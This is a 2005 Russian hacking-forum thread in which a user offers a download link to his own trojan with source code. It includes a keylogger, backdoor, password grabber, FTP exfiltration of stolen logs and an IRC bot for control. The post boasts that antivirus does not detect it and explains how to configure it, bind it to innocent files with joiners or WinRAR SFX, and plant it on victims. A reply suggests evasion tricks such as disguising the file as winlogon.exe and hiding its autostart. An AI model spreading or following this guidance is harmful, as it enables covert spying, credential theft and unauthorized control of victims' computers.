Выкладываю свой свежий троян + сорцы (бэкдур, кейлог, ирс-агент и др..)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Выкладываю свой свежий троян + сорцы (бэкдур, кейлог, ирс-агент и др..) - 2005-01-23 22:26:48
|
|
|
turtle
Сообщений: 1
Оценки: 0
Присоединился: 2005-01-23 22:23:20
|
Абсолютно новый троян, которым я написал и уже вдовль наигрался
поэтому решил выложить его широкой общественности.
http://ttarc.narod.ru/ttrojan.zip
выкладываю с ИСХОДНЫМ КОДОМ.. правда чуточку подпоченным.
(для того чтобы безграмотные вандалы не возомнили чего хорошего о себе)
кому нужно - разбереться
еще НЕ ОТЛАВЛИВАЕТСЯ АНТИВИРЯМИ!!
хорошо зарекомендавал себя..
файерволы не обходит.. если нужно сам доделаешь..
врядли я еще тут появлюсь, времени нет
так что со всеми вопросами в мыло bsturtle@list.ru
PS: вступлю в хактиму :)
==================================================================
[Russian]
Turtle Trojan 1.0
===================================================================
1) Общие сведения:
Название: Turtle Trojan
Версия: 1.0
Автор: Turtle
Компилятор: Delphi 6
Размер серверной части: 63 Кб. (Не пакованный),
27 Kб. (сжатый exe-компрессором UPX,
Copyright © 1996-2002
Markus Oberhumer
Laszlo Molnar
http://upx.sourceforge.net);
Сервер написан без визуальных компонент и классов,
выполнен целиком на Windows API
Расположение: %SYSTEM%
Автозагрузка: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Exe-файл сервера: DivXdrv.exe
===================================================================
[skip]
=================================================================
3) Назначение: Мониторинг удаленного компьютера.
=================================================================
4) Возможности:
* Клавиатурный шпион.
* BackDOOR. Позволяет подключиться по TCP-протоколу к удаленному ПК и
просматривать носители, также скачивать, удалять, выполнять
файлы и программы. В общем все выглядит как в Windows Commander :) .
* Высылает на ваш FTP сервер найденные и перехваченные
пароли, также логи созданные клавиатурным шпионом (Hooker, Хукер)
* При выходе в онлайн серверная часть выводит бота в IRC, откуда по команде сообщает
хозяину (вам) свой IP адрес, и другую небольшую но важную информацию.
(ИП адрес, имя компа, имя юзера, Версию ОС итд)
* Функции доступные из Клиентской части при прямом подключении
- получить список дисков
- получить списки директорий и файлов на дисках (как в Коммандере)
- скачать/удалить/запустить файлы
- Отправить сообщение (MessageBox)
- Открыть/закрыть CD-ROM
- Можно похрюкать флопом :) (если перейти на Диск А: например)
- Перезагрузить Комп
- Командная строка
- Выгрузить сервер
- Скрыть/показать рабочий стол, Панель задач
- Открыть браузер с определенной страницей
- Возможность узнать пути к папкам Мои документы, Сисемной и Windows
директории для быстрой навигации на вражеском компе.
и немногое другое
* Возможность докачки дополнений (Plugin) которые можно доработать самому
===================================================================
5) Настройка. Как все это работает? :
Вам необходимо сконфигурировать серверную часть(которую будем впаривать) под себя.
для этого мы воспользуемся конфигуратором (conf.exe)
Не запускайте конфигуратор прямо из архива. обязательно разархивируй conf.exe вместе с
server.dat в одну директорию.
Запускаем conf.exe.
тут необходимо заполнить поля:
1) IRC сервер. - это сервер на который будет выходить бот (напр. "irc.ircnet.ru")
2) IRC port - порт Ирс сервера (напр. "6667")
3) IRC Chan - Канал на котором бот будет висеть (напр. "#mybots")
4) BotNick - Ник бота который будет там сидеть. (напр. "MyBot")
(на самом будет сидеть ник вида ник+случайное число
и выйдет например ник MyBot21354);
5) BossNick - Ваш реальный ник в ИРС.. бот будет обращаться только к вам
в приват!! (напр: "MyCoolNick")
6) BotPassword - пароль для доступа к боту. Бот выдает информацию только своему
хозяину и только при указании правильного пароля. Что дает
защиту при использовании ваших ботов другими кулхакерами.
7) FTPserv - фтп сервер куда будут отправляться пароли и логи.
(напр. "ftp.narod.ru"). (Народ работает! проверено.)
8) FTPUser - ваша учетная запись, логин на фтп серваке (напр. "newuser")
9) FtpPass - пароль на доступ к фтп
После окончания работы конфигуратор создаст файл out.exe - готовый к работе троян!
дальше вы переименовываете его как хотите..приклеиваете к чему хотите..(Joiner''ом
или СуперКлеем http://bonza.narod.ru). и впариваете..
!внимание! такие вещи как "Супер Клей" с bonza.narod.ru занесены в антивирусные базы!
т.е после склейки касперский орет.
я предпочитаю склеваить WinRar-ом… он позволяет без лишних вопросов
распаковать в анвизибл режиме sfx архив например во временную папку и запустить
троян оттуда без лишних вопросов. - разбирайтесь сами или ищите нужные доки на эту тему.
После того как жертва запустил(а) файл с трояном, он копируется с системную директорию
%SYSTEM% и прописывается в автозагрузке.
После перезапука windows троян начинает работу.
Кейлоггер записывает все нажатые клавиши в файл %System%\hplt.thl.
причем сочетания <Del> Это значит что юзер нажимал Delete а <BS> - бекспейс.
причем в файле лога фиксируется имя программы в которой воодились эти данные.
если на экране компа появляется окошко в котором встречается слово "Пароль",
"Passw" "Установка связи" итп.. то Келоггер сдирает всю информацию с этого
окошка включая пароли под ********.. и записывает в файл hplt32.thl
Каждые 2-3 минуты троян проверяет соединение с Интернетом.
если интернет доступен, то:
- если лог с паролями превысил 100 байт, то он закачивается на ФТП
- если клавиатурный лог превысил 10 КБайт, то он закачивается на ФТП
(если логи превысили размер 300 кб, то они удаляются с диска
создаются заново.)
- ИРС бот выходит на ИРС канал, индексируя тем самым что жертва в данный
момент находится в сети.
вы зайдете на канал к боту и вам будут доступный команды:
!BOSSNICK, - выдаст имя владельца бота.
!HELP, - справка по командам
!IP <Botpassword>, - выдаст ИП адрес зараженного компа (напр. "!IP myPass")
!INFO <Botpassword>, - информацию о боте и версию ОС жертвы
!LAMERNAME <Botpassword> - имя юзера и имя компа жертвы
<BotPassWord> вы задавали при конфигурировании сервера.. без
пароля бот вам не ответит.
- узнав IP жертвы у ИРС-бота вы можете запустить клиент и присоединиться
к жертве. дальшеxxxxxxть, удалять(ЧТО СТРОГО НЕ РЕКОМЕНДУЕТСЯ) файлы.
запускать у жертвы всякие программы, прикалываться итп
- также каждые три минуты троян проверяет наличие обновления на фтп сервере
(файл: hpltplg.dll) который вы можете самостоятельно изготовить на любом
win32 языке программирования. шаблон изговоления плугина на дельфи
вы можете посмотреть в архиве hpltplg.zip.
изготовили hpltplg.dll, закачали на ФТП сервер, троян через 3 минуты его скачает,
и после перезапуска винды жерты новые функции заработают.
есть возможность разработать дополнительные 3 процедуры, которые будут срабатывать
через каждые X секунд (Х задается при разработке плугина)
===============================================================================
Чтобы уменьшить размер сервера до 27 кб необходимо скачать UPX
http://upx.sourceforge.net
пакуется командой: UPX.exe -9 servername.exe
===============================================================================
——-
Создатель: Turtle.
bsturtle@list.ru
|
|
|
|
|
Выкладываю свой свежий троян + сорцы (бэкдур, кейлог, ирс-агент и др..) - 2005-01-24 12:10:47
|
|
|
Maker
Сообщений: 647
Оценки: 0
Присоединился: 2004-03-11 18:50:32
|
Вот спасибо доброму человеку. На досуге можно покапаться…
|
|
|
|
|
Выкладываю свой свежий троян + сорцы (бэкдур, кейлог, ирс-агент и др..) - 2005-01-24 12:35:46
|
|
|
Harrior
Сообщений: 11
Оценки: 0
Присоединился: 2004-12-20 01:15:22
|
могу назвать перу минусов данного троя
1. Светится в TaskMng и его тамже можно завершить.
2. легко палится т.к. серится тамже где и другие трои.
3. стандартный запуск.
Вероятные решения.
1-2. сменить имя трою на winlogon.exe и поселить в \RECYCLER\
3. ставь на загрузку из %windir\Tasks . как? смотри www.microsoft.com MSDN.
и поменяй у файлика в тасках атрибут +h
|
|
|
|
|
|
